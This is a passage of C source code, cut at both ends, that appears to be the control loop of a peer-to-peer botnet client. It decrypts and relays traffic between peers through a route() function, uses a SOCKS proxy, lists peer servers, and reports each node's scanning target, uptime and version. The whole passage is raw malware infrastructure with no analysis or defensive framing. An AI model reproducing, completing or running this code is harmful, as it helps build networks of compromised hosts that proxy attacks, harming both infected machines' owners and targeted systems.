						ll.checksum=0;
						ll.id=llrc->id;
						audp_send(&tmpclient,&ll,sizeof(struct llheader));
					}
					else k=1;
				}
			}
			else k=1;
			if (udp.len < sizeof(struct header) || k);
			else if (rc->id != 1) {
				client=NULL;
				if (rc->id == astdio.ext2) {
					client=&astdio;
					client->sock=1;
				}
				else for (n=0;n<CLIENTS;n++) if (clients[n].sock != 0 && clients[n].ext2 == rc->id) client=&clients[n];
				if (client) switch(rc->tag) {
    				case 0x45:
					case 0x41: {
						_decrypt(buf+sizeof(struct header),rc->len);
						atcp_send(client,buf+sizeof(struct header),rc->len);
						} if (rc->tag == 0x41) break;
					case 0x42:
						if (rc->id == astdio.ext2);
						else atcp_close(client);
						break;
					case 0x43:
						break;
					case 0x44:
						break;
					case 0x46: {
						struct addsrv_rec *rc=(struct addsrv_rec *)buf;
						struct next_rec { unsigned long server; };
						unsigned long a;
						if (udp.len < sizeof(struct addsrv_rec)) break;
						for (a=0;rc->h.len > a*sizeof(struct next_rec) && udp.len > sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec));a++) {
							struct next_rec *fc=(struct next_rec*)(buf+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec)));
							if (client->ext4 == 1) {
								struct hostent *hp;
								if ((hp = gethostbyaddr((const char *)&fc->server, 4, AF_INET)) == NULL) atcp_sendmsg(client,"%d.%d.%d.%d\n",((unsigned char*)&fc->server)[0],((unsigned char*)&fc->server)[1],((unsigned char*)&fc->server)[2],((unsigned char*)&fc->server)[3]);
								else atcp_sendmsg(client,"%d.%d.%d.%d\t%s\n",((unsigned char*)&fc->server)[0],((unsigned char*)&fc->server)[1],((unsigned char*)&fc->server)[2],((unsigned char*)&fc->server)[3],hp->h_name);
							}
							else atcp_sendmsg(client,"%d.%d.%d.%d\n",((unsigned char*)&fc->server)[0],((unsigned char*)&fc->server)[1],((unsigned char*)&fc->server)[2],((unsigned char*)&fc->server)[3]);
						}
						} break;
					case 0x47: {
						struct info_rec *rp=(struct info_rec *)buf;
						struct timeval t;
						gettimeofday(&t,NULL);
						if (udp.len < sizeof(struct info_rec)) break;
						atcp_sendmsg(client,"Info on %d.%d.%d.%d: Scanning=%d.%d.%d.%d Uptime=%d In=%d Out=%d Version=%d Lag=%d\n",((unsigned char*)&rp->ip)[0],((unsigned char*)&rp->ip)[1],((unsigned char*)&rp->ip)[2],((unsigned char*)&rp->ip)[3],rp->a,rp->b,rp->c,rp->d,rp->uptime,rp->in,rp->out,rp->version,t.tv_sec-rp->reqtime);
						} break;
				}
				if (rc->id == astdio.ext2) client->sock=0;
			}
		}

		for (p=0;p<CLIENTS;p++) if (servers[p].sock != 0 && servers[p].len != 0) for (n=0;n<CLIENTS;n++) if (clients[n].sock == 0) {
			if (atcp_accept(&servers[p],&clients[n]) == 0) {
				struct add_rec rc;
				memset((void*)&rc,0,sizeof(struct add_rec));
				clients[n].ext2=checkid(rand());
				clients[n].ext3=servers[p].ext3;
				rc.h.tag=0x21;
				rc.h.id=clients[n].ext2;
				rc.server=(unsigned long)servers[p].ext;
				rc.port=(unsigned long)servers[p].ext2;
				rc.socks=aresolve(SOCKS);
				if (servers[p].ext6) rc.bind=servers[p].ext6;
				else rc.bind=0;
				route(1,rc.h.id,(unsigned long)servers[p].ext5,(void*)&rc,sizeof(struct add_rec));
			}
			else memset((void*)&clients[n],0,sizeof(struct ainst));
			break;
		}

		for (n=0;n<CLIENTS;n++) if (clients[n].sock != 0 && clients[n].len != 0) {
			struct ainst *server=NULL;
			client=&clients[n];
			memset(buf_,0,3000);
			a=atcp_recv(client,buf,3000);
			if (a == APENDING) break;
			for (p=0;p<CLIENTS;p++) if (servers[p].sock != 0 && servers[p].ext3 == client->ext3) server=&servers[p];
			if (server == NULL) atcp_close(client);
			else {
				if (a == AUNKNOWN) {
					struct kill_rec rc;
					memset((void*)&rc,0,sizeof(struct kill_rec));
					rc.h.tag=0x22;
					rc.h.id=client->ext2;
					route(1,rc.h.id,(unsigned long)server->ext5,(void*)&rc,sizeof(struct kill_rec));
					atcp_close(client);
				}
				else {
					struct data_rec rc;
					char *str=(char*)malloc(client->len+sizeof(struct data_rec));
					if (str != NULL) {
						memset((void*)&rc,0,sizeof(struct data_rec));
						rc.h.tag=0x23;
						rc.h.id=client->ext2;
						rc.h.len=client->len;
						_encrypt(buf,client->len);
						memcpy((void*)str,(void*)&rc,sizeof(struct data_rec));
						memcpy((void*)(str+sizeof(struct data_rec)),(void*)buf,client->len);
						route(1,rc.h.id,(unsigned long)server->ext5,(void*)str,client->len+sizeof(struct data_rec));
						FREE(str);
					}
				}
			}
		}
	}
	audp_close(&udp);
}
